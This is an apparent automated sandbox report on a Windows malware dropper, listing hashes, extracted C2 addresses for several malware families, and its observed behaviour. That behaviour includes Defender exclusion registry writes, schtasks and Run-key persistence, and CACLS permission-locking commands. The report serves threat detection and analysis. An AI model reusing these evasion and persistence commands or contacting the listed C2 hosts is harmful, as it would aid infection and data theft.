Analysis
max time kernel: 300s
max time network: 295s
platform: windows10-1703_x64
resource: win10-20230621-en
resource tags: arch:x64 arch:x86 image:win10-20230621-en locale:en-us os:windows10-1703-x64 system
submitted: 01/07/2023, 23:40
Static task: static1
Behavioral task: behavioral1
  Sample: 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
  Resource: win7-20230621-en
Behavioral task: behavioral2
  Sample: 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
  Resource: win10-20230621-en
General
Target: 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
Size: 4.2MB
MD5: ea191512e6ed56aa661ecb2deed1623e
SHA1: a2198ccd7d00ab727618ca2368f9f8c54b01c5d3
SHA256: 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7
SHA512: 7658e27038f60aa13df49bf48ac90a13cf77ef7e88e16453964b44e1cf9669ad3d06884692288a67a1dd3ffee89ce35e55750227e913bd3193dcc666f8bb8419
SSDEEP: 98304:sHejdaMKBnK2t4x+GwYIb4jYfCmAcZmPcxkk9cRj5MQL:sHGdaTBnK2tHG2UMdWGLcRWE
Malware Config
Extracted: amadey
  Version: 3.83
  C2: 5.42.65.80/8bmeVwqx/index.php
Extracted: gcleaner
  C2: 45.12.253.56
  C2: 45.12.253.72
  C2: 45.12.253.98
  C2: 45.12.253.75
Extracted: smokeloader
  Botnet: up3
Extracted: smokeloader
  Version: 2020
  C2: http://host-file-host6.com/
  C2: http://host-host-file8.com/
Extracted: redline
  Botnet: 280623_rc_11
  C2: rcn.tuktuk.ug:11285
  auth_value: 7dbd026b7e6c26ab5e41958efd6a2a6e
Signatures

Detect Fabookie payload 2 IoCs
  resource | yara_rule
  behavioral2/memory/612-157-0x0000000002E70000-0x0000000002FA1000-memory.dmp | family_fabookie
  behavioral2/memory/612-271-0x0000000002E70000-0x0000000002FA1000-memory.dmp | family_fabookie

Glupteba payload 1 IoCs
  resource | yara_rule
  behavioral2/memory/1472-273-0x0000000002E30000-0x000000000371B000-memory.dmp | family_glupteba

Modifies security service 2 TTPs 5 IoCs
  description | ioc | Process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess 34 IoCs
description pid Process procid_target PID 3636 created 3200 3636 XandETC.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 3636 created 3200 3636 XandETC.exe 25 PID 4612 created 3200 4612 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 1620 created 3200 1620 updChrome.exe 25 PID 3316 created 3200 3316 updChrome.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4936 created 3200 4936 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 4124 created 3200 4124 updater.exe 25 PID 1084 created 3200 1084 conhost.exe 25 PID 4124 created 3200 4124 updater.exe 25 -
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | 3eef203fb515bda85f514e168abb5973.exe
Downloads MZ/PE file

Drops file in Drivers directory 4 IoCs
  description | ioc | Process
  File created | C:\Windows\System32\drivers\etc\hosts | updChrome.exe
  File created | C:\Windows\System32\drivers\etc\hosts | updChrome.exe
  File created | C:\Windows\System32\drivers\etc\hosts | updChrome.exe
  File created | C:\Windows\System32\drivers\etc\hosts | updater.exe

Modifies Windows Firewall 1 TTPs 1 IoCs
  pid | Process
  3948 | netsh.exe

Stops running service(s) 3 TTPs
Executes dropped EXE 27 IoCs
  pid | Process
  612 | aafg31.exe
  828 | oldplayer.exe
  3636 | XandETC.exe
  3908 | oneetx.exe
  4888 | setup.exe
  1384 | updEdge.exe
  4612 | updChrome.exe
  4828 | toolspub2.exe
  4852 | toolspub2.exe
  4308 | updEdge.exe
  5088 | oneetx.exe
  3316 | updChrome.exe
  1472 | 3eef203fb515bda85f514e168abb5973.exe
  720 | updEdge.exe
  1620 | updChrome.exe
  872 | oneetx.exe
  2496 | 3eef203fb515bda85f514e168abb5973.exe
  4124 | updater.exe
  4936 | updater.exe
  4900 | csrss.exe
  3320 | injector.exe
  3824 | windefender.exe
  384 | oneetx.exe
  764 | windefender.exe
  4344 | oneetx.exe
  3400 | f801950a962ddba14caaa44bf084b55c.exe
  2128 | oneetx.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive information.
  resource | yara_rule
  behavioral2/files/0x000500000001af0c-4483.dat | upx
  behavioral2/files/0x000500000001af0c-4506.dat | upx
  behavioral2/files/0x000500000001af0c-4599.dat | upx

  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" | 3eef203fb515bda85f514e168abb5973.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 2 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | 3eef203fb515bda85f514e168abb5973.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 1 TTPs
Manipulates WinMonFS driver 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
  description | ioc | Process
  File opened for modification | \??\WinMonFS | csrss.exe
Drops file in System32 directory 12 IoCs
  description | ioc | Process
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | WMIC.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of SetThreadContext 8 IoCs
  description | pid | Process | procid_target
  PID 4828 set thread context of 4852 | 4828 | toolspub2.exe | 87
  PID 1384 set thread context of 680 | 1384 | updEdge.exe | 103
  PID 4308 set thread context of 4788 | 4308 | updEdge.exe | 104
  PID 720 set thread context of 3776 | 720 | powercfg.exe | 108
  PID 4936 set thread context of 2400 | 4936 | updater.exe | 272
  PID 4936 set thread context of 4164 | 4936 | updater.exe | 273
  PID 4124 set thread context of 1084 | 4124 | updater.exe | 274
  PID 4124 set thread context of 4104 | 4124 | updater.exe | 280
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
  description | ioc | Process
  File opened (read-only) | \??\VBoxMiniRdrDN | 3eef203fb515bda85f514e168abb5973.exe
Drops file in Program Files directory 8 IoCs
  description | ioc | Process
  File created | C:\Program Files\Google\Chrome\updater.exe | updChrome.exe
  File created | C:\Program Files\Google\Chrome\updater.exe | updChrome.exe
  File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
  File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
  File created | C:\Program Files\Google\Chrome\updater.exe | updChrome.exe

Drops file in Windows directory 4 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\windefender.exe | csrss.exe
  File opened for modification | C:\Windows\rss | 3eef203fb515bda85f514e168abb5973.exe
  File created | C:\Windows\rss\csrss.exe | 3eef203fb515bda85f514e168abb5973.exe
  File created | C:\Windows\windefender.exe | csrss.exe
Launches sc.exe 31 IoCs
Sc.exe is a Windows utility to control services on the system.
  pid | Process
  4976, 4812, 3812, 4932, 2688, 2056, 2072, 4164, 4072, 608, 1836, 2708, 3560, 2532, 4060, 4740, 2668, 4736, 616, 2500, 4248, 164, 2396, 984, 4076, 5036, 4736, 3360, 1416, 4896, 4132 | sc.exe (all 31 entries)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 9 IoCs
  pid | pid_target | Process | procid_target
  448 | 4888 | WerFault.exe | 80
  3232 | 4888 | WerFault.exe | 80
  4296 | 4888 | WerFault.exe | 80
  5052 | 4888 | WerFault.exe | 80
  4284 | 4888 | WerFault.exe | 80
  424 | 4888 | WerFault.exe | 80
  1596 | 4888 | WerFault.exe | 80
  4344 | 4888 | WerFault.exe | 80
  3424 | 4888 | WerFault.exe | 80
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  3568 | schtasks.exe
  1656 | schtasks.exe
  5068 | schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
  pid | Process
  1332 | WMIC.exe

Kills process with taskkill 1 IoCs
  pid | Process
  1724 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4852 toolspub2.exe 4852 toolspub2.exe 4612 updChrome.exe 4612 updChrome.exe 3316 updChrome.exe 3316 updChrome.exe 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE 3200 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  pid | Process
  3200 | Explorer.EXE

Suspicious behavior: LoadsDriver 2 IoCs
  pid | Process
  648 | Process not Found
  648 | Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs
  pid | Process
  4852 | toolspub2.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1384 updEdge.exe Token: SeDebugPrivilege 4308 updEdge.exe Token: SeDebugPrivilege 720 powercfg.exe Token: SeShutdownPrivilege 3200 Explorer.EXE Token: SeCreatePagefilePrivilege 3200 Explorer.EXE Token: SeShutdownPrivilege 3200 Explorer.EXE Token: SeCreatePagefilePrivilege 3200 Explorer.EXE Token: SeDebugPrivilege 1724 taskkill.exe Token: SeShutdownPrivilege 3200 Explorer.EXE Token: SeCreatePagefilePrivilege 3200 Explorer.EXE Token: SeDebugPrivilege 4788 AppLaunch.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 3776 AppLaunch.exe Token: SeDebugPrivilege 4040 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeIncreaseQuotaPrivilege 2316 powershell.exe Token: SeSecurityPrivilege 2316 powershell.exe Token: SeTakeOwnershipPrivilege 2316 powershell.exe Token: SeLoadDriverPrivilege 2316 powershell.exe Token: SeSystemProfilePrivilege 2316 powershell.exe Token: SeSystemtimePrivilege 2316 powershell.exe Token: SeProfSingleProcessPrivilege 2316 powershell.exe Token: SeIncBasePriorityPrivilege 2316 powershell.exe Token: SeCreatePagefilePrivilege 2316 powershell.exe Token: SeBackupPrivilege 2316 powershell.exe Token: SeRestorePrivilege 2316 powershell.exe Token: SeShutdownPrivilege 2316 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeSystemEnvironmentPrivilege 2316 powershell.exe Token: SeRemoteShutdownPrivilege 2316 powershell.exe Token: SeUndockPrivilege 2316 powershell.exe Token: SeManageVolumePrivilege 2316 powershell.exe Token: 33 2316 powershell.exe Token: 34 2316 powershell.exe Token: 35 2316 powershell.exe Token: 36 2316 powershell.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 680 AppLaunch.exe Token: SeIncreaseQuotaPrivilege 5068 powershell.exe Token: SeSecurityPrivilege 5068 powershell.exe Token: SeTakeOwnershipPrivilege 5068 powershell.exe Token: SeLoadDriverPrivilege 5068 powershell.exe Token: SeSystemProfilePrivilege 5068 
powershell.exe Token: SeSystemtimePrivilege 5068 powershell.exe Token: SeProfSingleProcessPrivilege 5068 powershell.exe Token: SeIncBasePriorityPrivilege 5068 powershell.exe Token: SeCreatePagefilePrivilege 5068 powershell.exe Token: SeBackupPrivilege 5068 powershell.exe Token: SeRestorePrivilege 5068 powershell.exe Token: SeShutdownPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeSystemEnvironmentPrivilege 5068 powershell.exe Token: SeRemoteShutdownPrivilege 5068 powershell.exe Token: SeUndockPrivilege 5068 powershell.exe Token: SeManageVolumePrivilege 5068 powershell.exe Token: 33 5068 powershell.exe Token: 34 5068 powershell.exe Token: 35 5068 powershell.exe Token: 36 5068 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeIncreaseQuotaPrivilege 3356 powershell.exe Token: SeSecurityPrivilege 3356 powershell.exe Token: SeTakeOwnershipPrivilege 3356 powershell.exe Token: SeLoadDriverPrivilege 3356 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4440 wrote to memory of 612 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 66 PID 4440 wrote to memory of 612 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 66 PID 4440 wrote to memory of 828 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 67 PID 4440 wrote to memory of 828 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 67 PID 4440 wrote to memory of 828 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 67 PID 4440 wrote to memory of 3636 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 68 PID 4440 wrote to memory of 3636 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 68 PID 828 wrote to memory of 3908 828 oldplayer.exe 69 PID 828 wrote to memory of 3908 828 oldplayer.exe 69 PID 828 wrote to memory of 3908 828 oldplayer.exe 69 PID 3908 wrote to memory of 3568 3908 oneetx.exe 70 PID 3908 wrote to memory of 3568 3908 oneetx.exe 70 PID 3908 wrote to memory of 3568 3908 oneetx.exe 70 PID 3908 wrote to memory of 4776 3908 oneetx.exe 71 PID 3908 wrote to memory of 4776 3908 oneetx.exe 71 PID 3908 wrote to memory of 4776 3908 oneetx.exe 71 PID 4776 wrote to memory of 4720 4776 cmd.exe 74 PID 4776 wrote to memory of 4720 4776 cmd.exe 74 PID 4776 wrote to memory of 4720 4776 cmd.exe 74 PID 4776 wrote to memory of 4732 4776 cmd.exe 75 PID 4776 wrote to memory of 4732 4776 cmd.exe 75 PID 4776 wrote to memory of 4732 4776 cmd.exe 75 PID 4776 wrote to memory of 2684 4776 cmd.exe 76 PID 4776 wrote to memory of 2684 4776 cmd.exe 76 PID 4776 wrote to memory of 2684 4776 cmd.exe 76 PID 4776 wrote to memory of 1588 4776 cmd.exe 77 PID 4776 wrote to memory of 1588 4776 cmd.exe 77 PID 4776 wrote to memory of 1588 4776 cmd.exe 77 PID 4776 wrote to memory of 3540 4776 cmd.exe 78 PID 4776 wrote to memory of 3540 4776 cmd.exe 78 PID 4776 wrote to memory of 3540 4776 
cmd.exe 78 PID 4776 wrote to memory of 1112 4776 cmd.exe 79 PID 4776 wrote to memory of 1112 4776 cmd.exe 79 PID 4776 wrote to memory of 1112 4776 cmd.exe 79 PID 3908 wrote to memory of 4888 3908 oneetx.exe 80 PID 3908 wrote to memory of 4888 3908 oneetx.exe 80 PID 3908 wrote to memory of 4888 3908 oneetx.exe 80 PID 3908 wrote to memory of 1384 3908 oneetx.exe 81 PID 3908 wrote to memory of 1384 3908 oneetx.exe 81 PID 3908 wrote to memory of 1384 3908 oneetx.exe 81 PID 3908 wrote to memory of 4612 3908 oneetx.exe 84 PID 3908 wrote to memory of 4612 3908 oneetx.exe 84 PID 3908 wrote to memory of 4828 3908 oneetx.exe 85 PID 3908 wrote to memory of 4828 3908 oneetx.exe 85 PID 3908 wrote to memory of 4828 3908 oneetx.exe 85 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 3908 wrote to memory of 4308 3908 oneetx.exe 88 PID 3908 wrote to memory of 4308 3908 oneetx.exe 88 PID 3908 wrote to memory of 4308 3908 oneetx.exe 88 PID 3908 wrote to memory of 3316 3908 oneetx.exe 92 PID 3908 wrote to memory of 3316 3908 oneetx.exe 92 PID 3908 wrote to memory of 1472 3908 oneetx.exe 95 PID 3908 wrote to memory of 1472 3908 oneetx.exe 95 PID 3908 wrote to memory of 1472 3908 oneetx.exe 95 PID 3908 wrote to memory of 720 3908 oneetx.exe 96 PID 3908 wrote to memory of 720 3908 oneetx.exe 96 PID 3908 wrote to memory of 720 3908 oneetx.exe 96 PID 3908 wrote to memory of 1620 3908 oneetx.exe 98 PID 3908 wrote to memory of 1620 3908 oneetx.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[1] C:\Windows\Explorer.EXE (PID 3200)
    cmd: C:\Windows\Explorer.EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe (PID 4440)
      cmd: "C:\Users\Admin\AppData\Local\Temp\2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\aafg31.exe (PID 612)
        cmd: "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\oldplayer.exe (PID 828)
        cmd: "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (PID 3908)
          cmd: "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\schtasks.exe (PID 3568)
            cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
            - Creates scheduled task(s)
        [5] C:\Windows\SysWOW64\cmd.exe (PID 4776)
            cmd: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\cmd.exe (PID 4720)
              cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          [6] C:\Windows\SysWOW64\cacls.exe (PID 4732)
              cmd: CACLS "oneetx.exe" /P "Admin:N"
          [6] C:\Windows\SysWOW64\cacls.exe (PID 2684)
              cmd: CACLS "oneetx.exe" /P "Admin:R" /E
          [6] C:\Windows\SysWOW64\cmd.exe (PID 1588)
              cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          [6] C:\Windows\SysWOW64\cacls.exe (PID 3540)
              cmd: CACLS "..\207aa4515d" /P "Admin:N"
          [6] C:\Windows\SysWOW64\cacls.exe (PID 1112)
              cmd: CACLS "..\207aa4515d" /P "Admin:R" /E
        [5] C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe (PID 4888)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"
            - Executes dropped EXE
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 448)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 656
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 3232)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 924
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 4296)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 984
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 5052)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1004
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 4284)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1016
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 424)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1044
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 1596)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1268
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 4344)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1280
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 3424)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1424
              - Program crash
          [6] C:\Windows\SysWOW64\cmd.exe (PID 672)
              cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit
            [7] C:\Windows\SysWOW64\taskkill.exe (PID 1724)
                cmd: taskkill /im "setup.exe" /f
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe (PID 1384)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (PID 680)
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe (PID 4612)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Drops file in Drivers directory
